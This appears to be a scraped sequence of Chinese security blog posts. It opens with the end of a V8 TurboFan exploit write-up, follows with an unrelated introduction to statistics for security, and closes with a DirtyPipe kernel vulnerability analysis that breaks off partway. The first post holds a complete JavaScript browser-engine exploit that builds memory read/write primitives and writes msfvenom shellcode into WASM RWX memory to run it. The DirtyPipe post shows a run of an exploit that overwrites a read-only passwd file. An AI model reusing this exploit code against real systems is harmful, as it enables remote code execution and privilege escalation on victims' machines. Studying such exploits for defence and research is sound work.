420x00002fac7911ecd0    0x0000000100000000    
43----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] -----
440x00002fac7911ecd8    0x00000cdfc0080989    MAP_TYPE    
450x00002fac7911ece0    0x00002fac7911ecb1    WASM_EXPORTED_FUNCTION_DATA_TYPE    
460x00002fac7911ece8    0x00000cdfc00842c1    ONE_BYTE_INTERNALIZED_STRING_TYPE    
470x00002fac7911ecf0    0x00000cdfc0082ad1    FEEDBACK_METADATA_TYPE    
480x00002fac7911ecf8    0x00000cdfc00804c9    ODDBALL_TYPE    
490x00002fac7911ed00    0x000000000000004f    
5052417812098225
51
52
53
54d8> %DumpObjects(0x00002fac7911eb29,41)
55----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] -----
560x00002fac7911eb28    0x00001024ebc89411    MAP_TYPE    
570x00002fac7911eb30    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
580x00002fac7911eb38    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
590x00002fac7911eb40    0x00002073d820bac1    WASM_MODULE_TYPE    
600x00002fac7911eb48    0x00002073d820bcf1    JS_OBJECT_TYPE    
610x00002fac7911eb50    0x00002fac79101741    NATIVE_CONTEXT_TYPE    
620x00002fac7911eb58    0x00002fac7911ec59    WASM_MEMORY_TYPE    
630x00002fac7911eb60    0x00000cdfc00804c9    ODDBALL_TYPE    
640x00002fac7911eb68    0x00000cdfc00804c9    ODDBALL_TYPE    
650x00002fac7911eb70    0x00000cdfc00804c9    ODDBALL_TYPE    
660x00002fac7911eb78    0x00000cdfc00804c9    ODDBALL_TYPE    
670x00002fac7911eb80    0x00000cdfc00804c9    ODDBALL_TYPE    
680x00002fac7911eb88    0x00002073d820bc79    FIXED_ARRAY_TYPE    
690x00002fac7911eb90    0x00000cdfc00804c9    ODDBALL_TYPE    
700x00002fac7911eb98    0x00002073d820bc69    FOREIGN_TYPE    
710x00002fac7911eba0    0x00000cdfc00804c9    ODDBALL_TYPE    
720x00002fac7911eba8    0x00000cdfc00804c9    ODDBALL_TYPE    
730x00002fac7911ebb0    0x00000cdfc00801d1    ODDBALL_TYPE    
740x00002fac7911ebb8    0x00002dc289f94d21    CODE_TYPE    
750x00002fac7911ebc0    0x0000000000000000    
760x00002fac7911ebc8    0x00007f9f9cf60000    
770x00002fac7911ebd0    0x0000000000010000    
780x00002fac7911ebd8    0x000000000000ffff    
790x00002fac7911ebe0    0x0000556b3a3e0c00    
800x00002fac7911ebe8    0x0000556b3a3ea630    
810x00002fac7911ebf0    0x0000556b3a3ea620    
820x00002fac7911ebf8    0x0000556b3a47c210    
830x00002fac7911ec00    0x0000000000000000    
840x00002fac7911ec08    0x0000556b3a47c230    
850x00002fac7911ec10    0x0000000000000000    
860x00002fac7911ec18    0x0000000000000000    
870x00002fac7911ec20    0x0000087e7c50a000    JumpTableStart [RWX]  <=======================
880x00002fac7911ec28    0x0000556b3a47c250    
890x00002fac7911ec30    0x0000556b3a47afa0    
900x00002fac7911ec38    0x0000556b3a47afc0    
91----- [ TUPLE2_TYPE : 0x18 ] -----
920x00002fac7911ec40    0x00000cdfc00827c9    MAP_TYPE    
930x00002fac7911ec48    0x00002fac7911eb29    WASM_INSTANCE_TYPE    
940x00002fac7911ec50    0x00002073d820b849    JS_FUNCTION_TYPE    
95----- [ WASM_MEMORY_TYPE : 0x30 ] -----
960x00002fac7911ec58    0x00001024ebc89e11    MAP_TYPE    
970x00002fac7911ec60    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
980x00002fac7911ec68    0x00000cdfc0080c19    FIXED_ARRAY_TYPE
通过如下的调试，可以得到相关偏移的信息（不同的checkout版本，可能偏移有差异）
1let WasmOffsets = { 
2  shared_function_info : 3,
3  wasm_exported_function_data : 1,
4  wasm_instance : 2,
5  jump_table_start : 31
6};
定位到JumpTableStart后，最后将shellcode写入并执行。Of course，覆写shellcode前应当备份内存数据，执行shellcode后再修复修改的内存。
（5）Exploit
  1/**** ┌──(root💀kali)-[~/bigric3/HW/SilverNeedle/scanner2/SilverNeedle-master]
  2└─# msfvenom --arch x64 --platform windows --payload windows/x64/exec cmd=calc.exe -f c
  3****/
  4
  5let shellcode = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00];
  6
  7let WasmOffsets = { 
  8  shared_function_info : 3,
  9  wasm_exported_function_data : 1,
 10  wasm_instance : 2,
 11  //jump_table_start : 31,
 12  jump_table_start: 29
 13};
 14
 15let AB_LENGTH = 0x200;
 16let AB_LENGTH_MARK = 0x0000020000000000;
 17let NEW_LENGTH64  = 0x0000006400000000;
 18let NEW_LENGTHC8  = 0x000000C800000000;
 19let MARK1SMI = 0x13;
 20let MARK2SMI = 0x37;
 21let MARK1 = 0x0000001300000000;
 22let MARK2 = 0x0000003700000000;
 23
 24let ARRAYBUFFER_SIZE = 0x40;
 25let PTR_SIZE = 8;
 26
 27let ab = new ArrayBuffer(8);
 28let fv = new Float64Array(ab);
 29let dv = new BigUint64Array(ab);
 30
 31let f2i = (f) => {
 32  fv[0] = f;
 33  return dv[0];
 34}
 35
 36let i2f = (i) => {
 37  dv[0] = BigInt(i);
 38  return fv[0];
 39}
 40
 41let tagFloat = (f) => {
 42  fv[0] = f;
 43  dv[0] += 1n;
 44  return fv[0];
 45}
 46
 47let hexprintablei = (i) => {
 48  return (i).toString(16).padStart(16,"0");
 49}
 50
 51let debug = (x,z, leak) => {
 52  print("oob index is " + z);
 53  print("length is " + x.length);
 54  print("leaked 0x" + hexprintablei(f2i(leak)));
 55  ////%DebugPrint(x);
 56  //%SystemBreak();
 57  ////%DumpObjects(x,13); // 23 & 3 to dump the jsarray's elements
 58};
 59
 60
 61var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
 62
 63
 64
 65let opt_me = (x) => {
 66  let arr = new Array(1.1,1.2,1.3,1.4,1.5,1.6,1.7);
 67  let y = (( x==1 ) ? 9007199254740992 : 9007199254740989) + 1 + 1;
 68  y = y - 9007199254740989; // max=2, actual max=5
 69  y = y * 2; // max=4, actual max=10
 70
 71  //print("=====>  0x64length: 0x" + i2f(NEW_LENGTH64) + "  0xc8: 0x" + i2f(NEW_LENGTHC8));
 72  // before out of bounds 2 write, don’t call self define func 
 73  arr[y] = 4.24399158193e-312;//2.121995790965e-312;  // corrupt arr.length => i2f(NEW_LENGTH64)
 74
 75
 76  var wasmModule = new WebAssembly.Module(wasmCode);
 77  var wasmInstance = new WebAssembly.Instance(wasmModule, {});
 78  var get_pwnd = wasmInstance.exports.main;
 79  print("[+] Debug get_pwnd...");
 80  //%DebugPrint(get_pwnd);
 81  var d = get_pwnd();
 82  console.log("[*] return from wasm: " + d);
 83
 84  let leak = arr[y];
 85  let arr2 = Array.of(1.2);
 86  let evil_ab = new ArrayBuffer(AB_LENGTH);
 87  let packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI, get_pwnd);
 88  //let ab_len_idx = arr.indexOf(2.121995790965e-312);//(5.43230922487e-312);
 89  let ab_len_idx = arr.indexOf(i2f(AB_LENGTH_MARK));//5.43230922487e-312);//i2f(AB_LENGTH_MARK));
 90  print("idx: "+ab_len_idx);
 91  if(ab_len_idx==-1)
 92        return;
 93
 94
 95  if (x == 1){
 96
 97    print("[+] Debug arr...");
 98    //%DebugPrint(arr);
 99
100    let ibackingstore_ptr = f2i(arr[ab_len_idx + 1]);
101    let fbackingstore_ptr = arr[ab_len_idx + 1];
102    print("[+] Found backingstore pointer : " + hexprintablei(ibackingstore_ptr));
103
104
105    let view = new BigUint64Array(evil_ab);
106    print("[+] Debug view...");
107    //%DebugPrint(view);
108    for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) {
109      view[i] = f2i(arr[ab_len_idx-3+i]);  // make fakeobj => evil ab obj
110      print("[+] arr"+i+": 0x"+hexprintablei(f2i(arr[ab_len_idx-3+i])) +";view: 0x"+hexprintablei(view[i]));
111    }
112
113
114    //%SystemBreak();
115    let magic_mark_idx = arr.indexOf(i2f(MARK1));
116    print("[+] magic_mark_idx: " + magic_mark_idx);
117    arr[magic_mark_idx+1] = tagFloat(fbackingstore_ptr);  // overwrite MATH PTR
118
119    // [4] leak wasm function pointer 
120    let ftagged_wasm_func_ptr = arr[magic_mark_idx+3]; // we want to read get_pwnd
121    print("[+] get_pwnd ptr: 0x" + hexprintablei(f2i(ftagged_wasm_func_ptr)) );
122
123    // set fake_evilab.ArrayBuffer 
124    view[4] = f2i(ftagged_wasm_func_ptr)-1n;
125
126    // [5] use RW primitive to find WASM RWX memory
127    let rw_view = new BigUint64Array(packed_elements_array[1]);
128    let shared_function_info = rw_view[WasmOffsets.shared_function_info];
129    view[4] = shared_function_info - 1n; // detag pointer
130    print("[+] shared info: 0x" + hexprintablei(view[4]));
131
132    rw_view = new BigUint64Array(packed_elements_array[1]);
133    let wasm_exported_function_data = rw_view[WasmOffsets.wasm_exported_function_data];
134    view[4] = wasm_exported_function_data - 1n; // detag
135    print("[+] export func: 0x" + hexprintablei(view[4]));
136
137    rw_view = new BigUint64Array(packed_elements_array[1]);
138    let wasm_instance = rw_view[WasmOffsets.wasm_instance];
139    view[4] = wasm_instance - 1n; // detag
140    print("[+] wasm instance: 0x" + hexprintablei(view[4]));
141
142    rw_view = new BigUint64Array(packed_elements_array[1]);
143    let jump_table_start = rw_view[WasmOffsets.jump_table_start]; 
144    print("[+] jmp start: 0x" + hexprintablei(jump_table_start));
145
146
147    view[4] = jump_table_start;
148    rw_view = new Uint8Array(packed_elements_array[1]);
149
150    // [6] write shellcode in RWX memory
151    //print("[+] start to write shellcode ....");
152    for (let i = 0; i < shellcode.length; ++i) {
153      print("[+] start to write shellcode: "+i);
154      rw_view[i] = shellcode[i];
155    }
156
157    print("[+] write shellcode end ....");
158
159    // [7] PWND!
160    //%SystemBreak();
161    get_pwnd();
162
163    print(res);
164
165    debug(arr,y, leak);
166    print("array's length: "+ arr.length);
167    print("oob read: " + arr[20]);
168  }
169
170  return leak;
171}
172
173
174opt_me(0);
175//%OptimizeFunctionOnNextCall(opt_me);
176//let res = opt_me(1);
177for(let i = 0; i < 0x10000; i++)
178    opt_me(1);
参考
https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/
https://kiprey.github.io/2021/01/v8-turboFan
https://sagecell.sagemath.org/?z=eJzT0DXUjDNQ0FIwijM1AlIahgraIEJXwVBfAySmqakJAHo9Bo0=&lang=sage
https://sagecell.sagemath.org/?z=eJzT0DXUjDNQ0FIwijM1BlIahgraCgaaADQcBCc=&lang=sage
https://sagecell.sagemath.org/?z=eJzT0DXUjDNQ0FIwijM1BlIahgraCob6GkCukaYmAFdlBZ8=&lang=sage





阅读原文
跳转微信打开



安全对抗，从统计学到人工智能（一）
Wed, 30 Mar 2022 17:53:00 +0800

原创 rebeyond 2022-03-30 17:53 


写在前面一直有一个想法，想把统计学的知识复习一下，边复习边尝试把统计学应用到安全对抗领域中。之前一直写的都是









写在前面
一直有一个想法，想把统计学的知识复习一下，边复习边尝试把统计学应用到安全对抗领域中。之前一直写的都是安全相关的内容，这次写的是统计学，看似跨度很大，其实一脉相承。我个人比较喜欢研究通用的底层逻辑，当时入坑安全也是因为上学时候想探究一下IT领域的底层逻辑。不过IT领域的逻辑的分化程度太高，缺少普适性。有没有一种更通用的研究各行各业底层运作规律的东西呢？有，那就是统计学。记得在统计学毕业时，我的导师在赠我的著作中写了让我至今仍然感触很深的一句话：明计数，识天下。当时没有完全理解，后面随着工作上遇到的事情越来越多，越觉得统计学重要，所以就有了这篇文章。统计学既有“识天下”的普适性，注定其是一门偏抽象的学科，就像编程语言里的抽象类，需要结合一个具体的行业领域才能发挥作用。为什么本文选择安全对抗作为具体的研究领域呢？没别的原因，就是因为我觉得如果直接以金融投资行业来讲有点太物质，而且我对安全对抗领域比较熟悉，深知在这个领域统计学有很多用武之地。
统计学是什么
统计学是什么？教科书上是这样写的：统计学定义是，通过搜索、整理、分析、描述数据等手段，以达到推断所测对象的本质，甚至预测对象未来的一门综合性科学。
个人认为，统计学是人们认识和研究未知事物的一个工具，是可以改变思维方式的一门科学。利用统计学，可以弱化特例个体的干扰来掌握总体规律，是人类对上帝视角的一种窥探。
统计学的基本原理是依据概率论，用样本数据去推断总体特征。概率，代表着不确定性。就像提到编程就会提到hello world，提到概率，就要提到抛硬币。抛硬币其实就是一个未知的事物，因为硬币落下的结果受非常多因素的影响，如风力、重力、起抛角度、硬币材质、PM2.5等等。如果一个人可以精确计算所有影响硬币的因素，那他就可以绝对精确的预测某一次抛硬币的结果。但是这很难，因此我们只需要把这些因素看成一个未知的黑盒，通过不停的试抛，记录结果，获得样本数据，然后用样本数据来推断总体特征，再根据总体特征去预测其他样本数据。
比如一个劣质工艺的硬币，抛1000次，300次正面，700次反面，那可以根据这1000次推断：抛这枚硬币得到正面的概率是30%，得到反面的概率是70%。因此可以预测，下一次抛硬币有70%的可能性可以得到反面的结果。
下一次抛的硬币有70%的可能性是反面，下一次请求有xx%的概率是恶意请求，下一个磁盘新增的文件有xx%的概率是恶意文件，下一个获奖用户有xx%概率是羊毛党，下一个xxx有xx%的概率是xxx，下一个…… Are you getting it？：）
如果没有经过专业的统计学的学习，或者大学时期没有选修过概率论与数理统计，可能大多数人对统计学的认知还停留在高中时期所讲的平均数、方差这种基本的统计描述概念，这可能会让大家对统计学有所误解，认为统计学就只有对已有数据的简单描述。通过了解安全行业很多防御规则也可以看出来，大都是在统计次数、硬编码个阈值，再画一堆炫酷的JS Chart，投到大屏上，称作大数据智能态势感知系统，其实智能化程度并不够。
一个例子
下面我们来看一个简单的利用样本来估计总体的例子。
一个学校有207名学生，我们从中随机抽取了15名同学的成绩：
[1] 96.4 93.2 89.3 89.8 99.9 91.8 90.5 87.8 92.9 97.7 84.3 81.9 85.9 93.9 94.1
能否根据这15个学生的成绩来推断207名学生的成绩情况？比如207个学生的平均分大约是多少？当然可能多数人会直接求这15个人的平均成绩，然后直接用这个平均成绩来估算全部学生的平均分值：(96.4+93.2+89.3+89.8+99.9+91.8+90.5+87.8+92.9+97.7+84.3+81.9+85.9+93.9+94.1)/15= 91.3
当然，这样也可以，这在统计学上叫做“点估计”，但是点估计没有将误差考虑进去，没有利用抽样分布特征，也不能给出概率的保证，每次从207人中抽出15人得到的结果可能都不一样。
有没有更准备的方法呢？有，区间估计：
经过统计学计算，207名学生的总平均分在83.84340 95.16993的区间内，可信度99%。
经过统计学计算，207名学生的总平均分在88.90982~92.99685的区间内，可信度95%。
经过统计学计算，207名学生的总平均分在87.37152 90.57515的区间内，可信度90%。
下面是一个学校207名学生的成绩：
[0]88.2  91.8  87.5  93.2  90.0  91.0  93.9  93.1  80.1  91.4  99.9  82.1  78.1  84.5  96.6  94.6
[17]  89.3  88.1  97.7  97.9  87.4  85.6  85.0  85.9  91.6  96.4  90.0  98.9  80.6  88.8  85.6  94.1
[33]  91.6  85.6  89.0  91.6  94.1  95.5  99.1  90.3  82.8  90.4  85.5 100.2  89.4  82.7  90.3  95.5
[49]  89.4  87.5 101.2  90.8  92.7  91.3  88.1  88.4  85.6  82.0  77.0  96.7  82.3  83.1  91.9  90.6
[65]  82.3  93.5  84.0  90.5  90.0  86.0  88.3  90.5  94.9  93.0  93.0  85.4  87.8  86.1 103.1  85.3
[81]  94.2  99.1  75.2  84.7  80.0  90.8  96.6  94.5  90.3  90.2  86.5  87.8  89.2  82.0  95.8  98.7
[97]  94.1  95.4  99.1  83.6  81.7  95.8  89.8  94.5  90.9  87.5  87.8  89.9  92.4  86.7  84.8  87.3
[113]  81.7  91.1  87.6  72.7  87.8  90.5  91.8  88.8  84.0  89.6  85.5  95.6  89.1  98.2  83.8  94.3
[129]  77.8  99.8  93.2  87.9  94.8  88.0  92.6  92.4  94.2  90.6  82.3  97.5  83.0  89.2  82.3  94.1
[145]  95.1  88.6  92.1  87.5  89.7  87.3  91.4  80.9  86.4  91.1  97.3  87.9  89.1  93.4  89.8  94.7
[161]  88.3  89.8  93.7  88.9  87.8  81.0  89.8  81.9  92.5  93.2  84.3  94.2  91.3  89.8  89.6  87.9
[177]  87.4  97.2  92.4  85.8  85.9  84.0 100.9  90.8  86.8  98.6  89.8  96.6  92.9  99.2 105.4  95.9
[193]  86.1  83.1  92.6  81.8  89.6  94.5  92.6  90.2  92.9  91.7  98.2  94.9  89.1  94.4  91.6
我们计算一下真实的平均成绩：90.0
可以看到我们通过15个样本数据，计算了3个不同可信度的区间，这三个区间都包含了真实的总体均数：90.0。
这就是统计学的魅力，它能从寥寥几个样本数据中，利用大自然的规律，去挖掘数据背后的信息。
一些基本概念
从上面的那个例子中，我们可以抽取出来很多基本概念。
同质
首先，我们看到这些都是同年级的学生，考的同一门科目。像这种影响被研究指标的主要因素是相同或基本相同的，就可以认为这些研究对象是同质的。
变异
虽然年级相同、年龄相仿、科目一样，但是每个人的成绩又都是不同的。因为每个人的成绩可能的影响因素是极其复杂的，因此同质的个体间其指标是存在差异的，这种差异叫做变异。可以这么说，没有变异就没有统计学，统计学的任务就是在同质的基础上，对个体变异进行分析研究，揭示由变异所掩盖的同质事物内在的本质和规律[1]。
个体
个体是统计分析所要研究的基本对象。上例中，每一个学生就是一个个体，这和数理统计中的概念稍有差别，数理统计中会将每个学生的成绩作为个体。因为数理统计更偏理论一些，而统计学更偏重于解决实际问题，往往在研究一个个体的时候可能不止一个观测指标，如研究某地儿童的发育情况，可能会取身高、体重两个指标，这时把儿童整体作为一个个体，会更便利。
总体
总体（population）是包含所研究的全部个体的集合。比如说，要研究某公司安全从业人员的薪酬情况，这时候总体就是该公司所有安全从业人员；要研究全球所有安全从业人员的薪酬情况，这时候总体就是全球所有的安全从业人员。而上文的例子中，总体就是全校207名学生。
一般情况下，总体的数据是无法全部获取的，可能是由于成本，也可能是由于可行性，也可能是其他各种原因。
样本
既然无法获取所要研究总体的全量数据，那就要从总体中抽一部分出来研究，这一部分是总体的一个子集，叫做样本（sample）。
样本容量（sample size） 也叫样本量，是单个样本内包含的个体数量，比如上例中，样本是15个学生的成绩，那么样本容量就是15。
样本数量 上例中，我们只有一组15个学生的成绩数据，那么样本数量就是1。
抽样
样本是怎么来的呢？是从总体里面抽出来的。从总体中选出部分个体的过程叫做抽样，其基本要求是抽样获取的样本对总体要有充分的代表性。抽样可分为：简单随机抽样、分层抽样、系统抽样、整群抽样。
统计量
又叫抽样统计量，是对样本的观测值进行某种计算而获取到的一个指标，如上例中15个学生的平均成绩即为一个统计量。注意统计量和总体参数的差别，由样本计算出来的是统计量，由总体计算出来的是总体参数。统计量可以用于对统计参数进行估计（点估计）。
参数
描述总体某一属性的指标，如上例中全体学生的平均成绩（总体均数）即为总体参数，一般用希腊字母μ，σ，π表示。
误差
误差（errors）是观察值与真实值之间的差异。根据误差的来源，可分为如下三类：
随机误差 由于多种随机因素导致的观察值与真实值之间的差异，随机误差的特点是差异是正反双向均衡的，可以通过多次重复测量来降低误差，比如取多次测量结果的平均值。抽样误差（sampling error）就是一种随机误差。样本统计量与总体参数之间的差异叫做抽样误差。抽样误差是可控制和计算的，可以通过增加样本容量来减少抽样误差。
系统误差 系统误差遵循一定的规律，误差值具有固定方向或者恒定不变，如天平未校准导致测量的结果偏高。系统误差是可以避免的，如对仪器进行校准、按照操作流程进行质量控制等。
非系统误差 又称过失误差，是指因操作失误导致的观察值与真实值之间的差异。如抄错数字、写错计量单位等。非系统误差可以通过仔细核对予以清除。[2]
变量
在统计学研究中的研究指标叫做变量，如上例中学生的成绩。类似编程语言，统计学中的变量也分为不同的数据类型：
* 定量数据
    * 连续性数据
    * 离散型数据
* 分类数据
    * 两分类
    * 多分类
        * 顺序变量
        * 名义变量
* 生存时间数据
不同的数据类型，适用不同的统计学方法。
总结
本文通过一个简单的例子来引入了统计学的一些基本概念，概念难免枯燥，但这是基石。后续我也会继续结合不同的实例来跟大家一起继续深入统计学的世界，探索统计的奥妙和神奇。到最后，你会发现，现在比较火的人工智能（AI），其理论基础其实就是统计学[3]，不过AI在传统统计学的基础上还揉入了很多工程化的实现，比如引入分布式计算来做数据分析等，这可能是传统统计研究者所不擅长的，不过这不是个理论问题，这只是个技术问题。具体到网络安全领域，其实有很多的场景适合利用统计学加成来完成更智能的攻击或者防守，因此建议对传统安全技术已经审美疲劳的朋友，可以尝试一下安全和统计的嫁接。由于想写的内容比较多，本系列文章会以连载的形式发布。行文若有纰漏之处，欢迎批评指正。
参考
1.http://www.tjxzj.net/789.html
2.https://mengte.online/archives/173
3.https://finance.qq.com/a/20180811/044291.htm





阅读原文
跳转微信打开



DirtyPIPE漏洞分析从0到1
Thu, 10 Mar 2022 09:50:00 +0800

原创 bigric3_ 2022-03-10 09:50 


水平有限，如有错误欢迎联系指正vx:1084099570 或 bigric3_1. 环境搭建1）编译内核#









水平有限，如有错误欢迎联系指正vx:1084099570 或 bigric3_

1. 环境搭建

1）编译内核
# 补丁信息# https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/?id=9d2231c5d74e13b2a0546fee6737ee4446017903&id2=e783362eb54cd99b2cac8b3a9aeac942e6f6ac07git  clone https://github.com/torvalds/linux.git#切换到漏洞版本git  checkout e783362eb54cd99b2cac8b3a9aeac942e6f6ac07make x86_64_defconfigmake menuconfig
设置编译选项
•Compile the kernel with debug info•Provide GDB scripts for kernel debugging
编译
•make -j8

2）编译bzbox
wget https://busybox.net/downloads/busybox-1.35.0.tar.bz2tar -jxf busybox-1.35.0.tar.bz2make menuconfigmake -j8make install
编译完成后，生成的文件系统在./install目录下，创建目录及初始化脚本
# mkdir -p  proc sys dev etc/init.d# vim ./init# cat ./init  #!/bin/sh  echo "INIT SCRIPT"  mkdir /tmp  mount -t proc none /proc  mount -t sysfs none /sys  mount -t devtmpfs none /dev  mount -t debugfs none /sys/kernel/debug  mount -t tmpfs none /tmp  echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"  setsid /bin/cttyhack setuidgid 1000 /bin/sh
打包文件系统
chmod +x ./init# 将作者的poc复制到文件系统，需要静态编译-staticcp ../../../vulns/DirtyPipe/writer ./cp ../../../vulns/DirtyPipe/splicer ./find . | cpio -o --format=newc > ../../rootfs.img
启动脚本
#!/bin/shqemu-system-x86_64 \    -m 64M \    -nographic \    -kernel ./linux_knl/linux/arch/x86/boot/bzImage \    -initrd  ./rootfs.img \    -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 nokaslr" \    -smp cores=2,threads=1 \    -cpu kvm64

2. 复现问题
进入虚拟机后，启动poc，测试作者的poc失败，不分析
./writer >/tmp/foo &./splicer /dev/null &head -n10 /tmp/foo
测试作者的exploit^[1]，只是测试一下越权任意文件写的能力，在busybox中创建如下target
/ $ ls -l ./etc/passwd1-rw-r--r-- 1 root root 90 Mar  8 17:23 ./etc/passwd1/ $ cat ./etc/passwd1aaaa bbbbbbbbbbbbbbbbbbbbbbbbaaaa bbbbbbbbbbbbbbbbbbbbbbbbaaaa bbbbbbbbbbbbbbbbbbbbbbbb
启动虚拟机，执行exp，成功修改了644权限的passwd1文件
/ $ ./expBacking up /etc/passwd1 to /tmp/passwd1.bak ...Setting root password to "aaron"...system() function call seems to have failed :(/ $ cat /etc/passwd1aaaa:$1$aaron$pIwpJwMMcozsUxAtRa85w.:0:0:test:/root:/bin/shaaaa bbbbbbbbbbbbbbbbbbbbbbbb/ $ iduid=1000 gid=1000 groups=1000

3. 分析

1）结论
先创建带PIPE_BUF_FLAG_CAN_MERGE标签的pipe_buf，然后利用splice底层的零拷贝机制，splice调用copy_page_to_iter_pipe完成pipe_buf的页和目标文件page_cache的绑定，且完成绑定后未置空pipe_buf的flags，最后利用pipe_write对带PIPE_BUF_FLAG_CAN_MERGE标签的pipe_buf写时，直接获取pipe_buf的页引用，且写时不存在权限检查，最后导致了越权写任意文件任意数据，准确的说是写任意具有读权限的文件任意数据（因为splice底层实现，校验了file的读属性）。

2）补丁信息
漏洞的引入在commit^[2]，修改了匿名管道缓冲区的merge属性的设置，引入了属性PIPE_BUF_FLAG_CAN_MERGE，同样在漏洞的补丁^[3]里，对管道的缓冲区的flags进行了初始化设置为0，如下
diff --git a/lib/iov_iter.c b/lib/iov_iter.cindex b0e0acdf96c15..6dd5330f7a995 100644--- a/lib/iov_iter.c+++ b/lib/iov_iter.c@@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by         return 0;
     buf->ops = &page_cache_pipe_buf_ops;+    buf->flags = 0;     get_page(page);     buf->page = page;     buf->offset = offset;@@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size,             break;
         buf->ops = &default_pipe_buf_ops;+        buf->flags = 0;         buf->page = page;         buf->offset = 0;         buf->len = min_t(ssize_t, left, PAGE_SIZE);
根据作者的说法，在commit 241699cd72a8 “new iov_iter flavour: pipe-backed” (Linux 4.9, 2016)^[4]中新增的两个函数即可实现任意设置pipe_buffer的属性，但是并不能造成什么实际的影响，直到linux5.8的commit引入了可以注入PIPE_BUF_FLAG_CAN_MERGE。
下面对着Linux源码和作者公开的exploit调试分析一下。
3）创建带PIPE_BUF_FLAG_CAN_MERGE的空pipe_buf
exp中的代码如下
    // 将pipe的缓冲区全部打上标签，因为pipe的缓冲区是环形数组，每个成员指向一个内存页    for (unsigned r = pipe_size; r > 0;) {        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;        write(p[1], buffer, n);        r -= n;    }
write在内核中调用pipe_write，pipe的缓冲区在内核中的实现是一个环形数组，数组的每个元素映射一个内存页。只要缓冲区未满则向管道写入数据，非direct io模式会打上flagPIPE_BUF_FLAG_CAN_MERGE
// pipe.c#414static ssize_tpipe_write(struct kiocb *iocb, struct iov_iter *from){    // ...    // #488: pipe缓冲区未满    if (!pipe_full(head, pipe->tail, pipe->max_usage)) {        unsigned int mask = pipe->ring_size - 1;
        // 获取pipe的缓冲区及pipe的临时页tmp_page，后续用于pipe_buf的初始化        struct pipe_buffer *buf = &pipe->bufs[head & mask];        struct page *page = pipe->tmp_page;
        // #519: 初始化buf        /* Insert it into the buffer array */        buf = &pipe->bufs[head & mask];        buf->page = page;        buf->ops = &anon_pipe_buf_ops;        buf->offset = 0;        buf->len = 0;
        // #525: 非DIRECT IO，利用OS的Page Cache向另端写，同时打上PIPE_BUF_FLAG_CAN_MERGE        if (is_packetized(filp)            buf->flags = PIPE_BUF_FLAG_PACKET;        else            buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
后续通过read读空pipe管道缓冲区
    /* drain the pipe, freeing all pipe_buffer instances (but       leaving the flags initialized) */    for (unsigned r = pipe_size; r > 0;) {        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;        read(p[0], buffer, n);        r -= n;    }

4）利用splice的零拷贝绑定pipe_buf->page到page_cache
继续，exp中通过splice底层的零拷贝机制，将pipe的buf_page引用到文件的page_cache
    /* open the input file and validate the specified offset */    const int fd = open(path, O_RDONLY); // yes, read-only! :-)
